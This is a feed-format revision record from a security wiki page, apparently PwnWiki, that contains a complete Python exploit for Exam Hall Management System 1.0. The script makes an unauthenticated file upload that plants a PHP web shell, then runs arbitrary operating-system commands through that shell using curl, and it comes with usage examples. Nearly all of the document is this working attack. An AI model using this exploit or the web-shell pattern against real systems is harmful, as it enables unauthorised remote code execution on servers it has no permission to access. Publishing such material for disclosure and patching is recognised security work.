https://pwnwiki.com/index.php?action=history&feed=atom&title=Exam_Hall_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26RCE%E6%BC%8F%E6%B4%9E Exam Hall Management System 1.0 任意文件上傳&RCE漏洞 - Revision history 2026-04-05T19:04:13Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Exam_Hall_Management_System_1.0_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26RCE%E6%BC%8F%E6%B4%9E&diff=6513&oldid=prev Pwnwiki: Created page with "<languages /> <translate> ==漏洞影響== </translate> # Version: 1.0 ==EXP== <pre> # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthe..." 2021-07-08T11:11:43Z <p>Created page with &quot;&lt;languages /&gt; &lt;translate&gt; ==漏洞影響== &lt;/translate&gt; # Version: 1.0 ==EXP== &lt;pre&gt; # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthe...&quot;</p> <p><b>New page</b></p><div>&lt;languages /&gt;<br /> &lt;translate&gt;<br /> ==漏洞影響==<br /> &lt;/translate&gt;<br /> # Version: 1.0<br /> ==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)<br /> # Exploit Author: Davide 'yth1n' Bianchin<br /> # Contacts: davide dot bianchin at dedagroup dot it<br /> # Original PoC: https://exploit-db.com/exploits/50103<br /> # Date: 06.07.2021<br /> # Vendor Homepage: https://www.sourcecodester.com<br /> # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html<br /> # Version: 1.0<br /> # Tested on: Kali Linux<br /> <br /> import requests<br /> from requests_toolbelt.multipart.encoder import MultipartEncoder<br /> import os<br /> import sys<br /> import string<br /> import random<br /> import time<br /> <br /> host = 'localhost' #CHANGETHIS<br /> path = 'SourceCode' #CHANGETHIS<br /> <br /> url = 'http://'+host+'/'+path+'/pages/save_user.php'<br /> <br /> def id_generator(size=6, chars=string.ascii_lowercase):<br /> return ''.join(random.choice(chars) for _ in range(size))+'.php'<br /> <br /> if len(sys.argv) == 1:<br /> print(&quot;#########&quot;)<br /> print(&quot;Usage: python3 examhallrce.py command&quot;)<br /> print(&quot;Usage: Use the char + to concatenate commands&quot;)<br /> print(&quot;Example: python3 examhallrce.py whoami&quot;)<br /> print(&quot;Example: python3 examhallrce.py ls+-la&quot;)<br /> print(&quot;#########&quot;)<br /> exit()<br /> <br /> <br /> filename = id_generator()<br /> print(&quot;Generated &quot;+filename+ &quot; file..&quot;)<br /> time.sleep(2)<br /> print(&quot;Uploading file..&quot;)<br /> time.sleep(2)<br /> <br /> <br /> <br /> <br /> def reverse():<br /> command = sys.argv[1]<br /> multipart_data = MultipartEncoder({<br /> 'image': (filename, '&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;', 'application/octet-stream'),<br /> 'btn_save': ''<br /> })<br /> r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type}) <br /> endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' <br /> urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''<br /> print(&quot;Success, file correctly uploaded at: &quot; +endpoint+ &quot;&quot;)<br /> time.sleep(1) <br /> print(&quot;Executing command in 1 seconds:\n&quot;)<br /> time.sleep(1)<br /> os.system(&quot;curl -X GET &quot;+urlo+&quot;&quot;)<br /> <br /> reverse()<br /> &lt;/pre&gt;</div> Pwnwiki